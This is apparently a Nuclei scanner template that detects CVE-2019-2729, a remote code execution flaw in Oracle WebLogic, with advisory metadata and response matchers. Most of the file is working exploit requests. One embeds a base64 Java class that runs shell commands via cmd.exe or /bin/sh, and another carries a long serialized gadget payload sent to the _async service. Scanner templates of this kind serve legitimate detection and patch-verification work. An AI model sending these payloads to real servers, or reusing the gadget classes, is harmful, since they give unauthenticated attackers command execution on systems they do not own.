id: CVE-2019-2729
info:
name: Oracle WebLogic Server Administration Console - Remote Code Execution
author: igibanez
severity: critical
description: |
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
reference:
- https://www.oracle.com/security-alerts/alert-cve-2019-2729.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-2729
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
- https://www.oracle.com/security-alerts/cpuapr2020.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-2729
cwe-id: CWE-284
epss-score: 0.97101
epss-percentile: 0.99761
cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: oracle
product: communications_diameter_signaling_router
tags: cve,cve2019,oracle,rce,weblogic
http:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>
- |
POST /_async/AsyncResponseService HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
xxxxoracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130673013951051101001011101167811710998101114730149511611497110115108101116731101001011209101095981211161019911110010111511603919166910695991089711511511601891761069711897471089711010347671089711511559760595110971091011160187610697118974710897110103478311611410511010359760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-11171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112008-82-54-2-70-6600050099100303470977037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621018106971189747105111477010510810187114105116101114704210221069711897471089711010347831161141051101036611710210210111470441004503410161069711897471089711010347841041141019710070471013991171141141011101168410411410197100102040417610697118974710897110103478410411410197100591204905010048051102110310111667111110116101120116671089711511576111971001011141025404176106971189747108971101034767108971151157611197100101114591205305410048055101478057102110697118974710897110103476710897115115761119710010111470591011103101116821011151111171149910110344076106971189747108971101034783116114105110103594176106971189747110101116478582765912061062100600631012106971189747110101116478582767065107103101116809711610410204041761069711897471089711010347831161141051101035912067068100660691069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912071072100450731017464647464647102971181059911111046105991118075108116111831161141051101031207706810045078102140761069711897471089711010347831161141051101035941861201008010043081101610697118974710897110103478311611410511010370831010861171081101011149798108101808510084081101410697118974710511147871141051161011147088104240761069711897471089711010347671049711483101113117101110991015941761069711897471051114787114105116101114591207109010089091105102108117115104120930111008909410138311697991077797112849798108101103012111511111510111410597108478011911010111451575652505148504850525153485110327612111511111510111410597108478011911010111451575652505148504850525153485159033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100041014000120100050150980001019020020120006300030001-79000201300060100046014000320300010150980000010210220100010230240202500040102601019027020120007300040001-790002013000601000500140004204000101509800000102102201000102802902000103003103025000401026080410110101200081060200060-8903176-6904389-6904589-73046-72052-740561858-74064-74070-740741876-74074-74079-73082-69084891886-73087-74092-74095-7900010960003013020320002033017000100102035016091171130126011001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100054014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012608120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120
- |
GET /_async/favicon.ico HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(body_1, "CVE-2019-2729-POC")'
condition: and
- type: dsl
dsl:
- 'status_code_2 == 202'
- 'contains(body_3, "Vulnerable")'
condition: and
# digest: 4a0a00473045022056f570dae3a475d8e9d5946b8f097ff6a3bc87242b915d980e8f79e50efedf23022100af5ffb8655d0e5c30dc211cc148590b77a9ac2dee63462cc90701bb0969ac0f2:922c64590222798bb761d5b6d8e72950